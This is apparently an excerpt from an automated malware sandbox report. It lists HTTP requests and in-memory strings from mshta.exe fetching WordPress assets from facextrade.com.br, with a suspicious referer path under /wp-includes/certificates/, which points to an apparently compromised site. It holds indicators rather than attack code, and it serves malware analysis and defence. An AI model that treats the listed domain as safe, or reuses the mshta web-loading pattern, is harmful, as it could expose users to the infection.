Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/images/up-arrow.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-embed.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: facextrade.com.brConnection: Keep-Alive
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 09:39:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 09:39:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Tue, 16 Aug 2022 09:39:38 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8
X-Varnish: 15075246
Age: 0
Via: 1.1 varnish-v4
Transfer-Encoding: chunked
Connection: keep-alive
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Tue, 16 Aug 2022 09:39:38 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"
Content-Type: text/html; charset=UTF-8
X-Varnish: 21929784
Age: 0
Via: 1.1 varnish-v4
Transfer-Encoding: chunked
Connection: keep-alive
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3e
Source: mshta.exe, 0000000A.00000002.547963442.00000000073F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3http://
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3tC:
Source: mshta.exe, 0000000A.00000003.385971386.00000000070CF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1
Source: mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherryg
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.csr
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386677165.0000000003585000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3.brC:
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3ll
Source: mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3-
Source: mshta.exe, 0000000A.00000003.387016057.000000000CF0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3e
Source: mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3f
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3u
Source: mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3y
Source: mshta.exe, 0000000A.00000002.556041282.000000000CC1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.png
Source: mshta.exe, 0000000A.00000002.556041282.000000000CC1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.png9
Source: mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.pngF
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.pngs?ver=1.0=1.0
Source: mshta.exe, 0000000A.00000002.538240401.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.pngw
Source: mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387469878.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.536752026.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png
Source: mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387469878.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.536752026.00000000034E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png1
Source: mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png5501425981.pngn.js.3.0
Source: mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png8
Source: mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.pngi
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20
Source: mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.200
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20C:
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20X
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20y
Source: mshta.exe, 0000000A.00000003.386063052.0000000007133000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545320205.0000000007133000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/switcher.png
Source: mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556493364.000000000CCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/switcher.png_bg4.jpgtrap.min.js?ver=2.3.0
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2C:
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2d
Source: mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.d
Source: mshta.exe, 0000000A.00000003.385971386.00000000070CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.c
Source: mshta.exe, 0000000A.00000002.553224347.0000000008397000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.396742788.0000000008396000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.396591256.0000000008390000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.396714180.0000000008393000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.396641425.0000000008391000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.396691296.0000000008392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/img/prev.pnghttp://facextra
Source: mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/
Source: mshta.exe, 0000000A.00000003.385971386.00000000070CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.cs
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl
Source: mshta.exe, 0000000A.00000003.385971386.00000000070CF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel
Source: mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/motopress-content-editH
Source: mshta.exe, 0000000A.00000003.385971386.00000000070CF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.cs
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.
Source: mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386140675.0000000006B47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386088242.000000000714D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.544798464.00000000070BA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.385933121.00000000070A9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545468854.000000000714D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386088242.000000000714D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.404023493.0000000008084000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.544798464.00000000070BA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.404045211.0000000008086000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.404072155.000000000808C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.385933121.00000000070A9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.550598367.000000000808D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545468854.000000000714D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.404061427.000000000808B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/admin/data_management/
Source: mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0C:
Source: mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556493364.000000000CCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0E
Source: mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0U
Source: mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0a_
Source: mshta.exe, 0000000A.00000002.541711426.0000000006AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0b
Source: mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556493364.000000000CCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0er
Source: mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556493364.000000000CCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0tW
Source: mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0y
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387469878.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.536752026.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.css
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-
